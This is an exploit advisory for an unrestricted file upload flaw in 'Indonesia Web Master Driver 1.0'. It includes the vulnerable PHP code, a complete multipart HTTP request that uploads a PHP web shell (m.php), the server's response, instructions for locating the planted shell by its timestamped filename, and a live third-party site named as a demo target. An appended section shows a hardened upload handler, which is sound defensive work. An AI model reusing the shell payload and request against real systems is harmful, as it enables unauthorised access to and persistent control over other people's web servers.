Indonesia Web Master Driver 1.0 - Shell Upload

2022.10.12
X-DEX (SG)
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Indonesia Web Master Driver 1.0 - Shell Upload
# Date: 10-10-2022
# Exploit Author: X-DEX
# Vendor Homepage: https://themeforest.net/user/webmasterdriver
# Version: v1.0
# Tested on: Kali Linux

----- POC -----

Note : vulnerability at http://localhost/registact.php

"
$image1=$_FILES["img1"]["name"];
$image2=$_FILES["img2"]["name"];
$newimg1 = date('dmYHis').$image1;
$newimg2 = date('dmYHis').$image2;
move_uploaded_file($_FILES["img1"]["tmp_name"],"image/id/".$newimg1);
move_uploaded_file($_FILES["img2"]["tmp_name"],"image/id/".$newimg2);
"

---------------

Request :

URL - http://localhost/registact.php
===============
use burpsuite

POST /registact.php HTTP/1.1
Host: http://localhost
Content-Length: 1007
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLBXMHTxHs8OmgM8w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="MAX_FILE_SIZE"

512000
------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="img1"; filename="m.php"
Content-Type: application/x-php

<?php
echo "<body bgcolor=black>";
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >";
echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input type=submit name=sut value=Upload></form>";
if( isset($_POST['sut']) )
{
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
    {
        echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>";
    }
    else
    {
        echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>";
    }
}
?>
------WebKitFormBoundaryLBXMHTxHs8OmgM8w--

Response

HTTP/1.1 200 OK
Connection: close
x-powered-by: localhost
set-cookie: PHPSESSID=164455c4fc628fc476d48023c0f44e2e; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-type: text/html; charset=UTF-8
Content-Length: 153
vary: Accept-Encoding,User-Agent
date: Tue, 11 Oct 2022 02:21:20 GMT
server: LiteSpeed
x-xss-protection: 1; mode=block
x-content-type-options: nosniff

<script>alert('Email sudah terdaftar, silahkan gunakan email lain!');</script><script type='text/javascript'> document.location = 'regist.php'; </script>

shell access = http://localhost/image/id/date('dmYHis')m.php
date('dmYHis') use your brain hihihihi

Demo site : https://panjitrans.net/registact.php
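For comparison with the registact.php snippet quoted above, a hardened version of the same img1/img2 handling, added here as an example and not taken from the vendor or the advisory author. The function name store_id_image, the constants ALLOWED_TYPES and MAX_BYTES, and the choice of JPEG and PNG as the accepted formats are assumptions made for illustration.

```php
<?php
// Added example, not the vendor's code. Fixes the two flaws in the quoted
// snippet: the stored name came from the client ($_FILES[...]["name"],
// extension included) and the file content was never checked.

// Assumed policy: ID images are JPEG or PNG only. The extension written to
// disk comes from this map, never from the upload.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
const MAX_BYTES = 512000; // same limit the form sends as MAX_FILE_SIZE

function store_id_image(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $tmp = $file['tmp_name'];
    if (!is_uploaded_file($tmp) || filesize($tmp) > MAX_BYTES) {
        throw new RuntimeException('invalid upload');
    }
    // Detect the type from the bytes on disk; the request's filename and
    // Content-Type header are attacker-controlled and are ignored.
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $ext  = ALLOWED_TYPES[$mime] ?? null;
    if ($ext === null || getimagesize($tmp) === false) {
        throw new RuntimeException('not an accepted image');
    }
    // Random server-side name: not guessable from a timestamp and never
    // ending in .php or any other client-chosen extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Drop-in use at the point where the original built $newimg1 / $newimg2.
if (isset($_FILES['img1'], $_FILES['img2'])) {
    try {
        $newimg1 = store_id_image($_FILES['img1'], __DIR__ . '/image/id');
        $newimg2 = store_id_image($_FILES['img2'], __DIR__ . '/image/id');
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit('Image rejected');
    }
}
```

As a second layer, image/id/ should be served with script execution disabled, or the files stored outside the web root, so that a file that slips past validation is never interpreted as PHP.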



Copyright 2024, cxsecurity.com

 
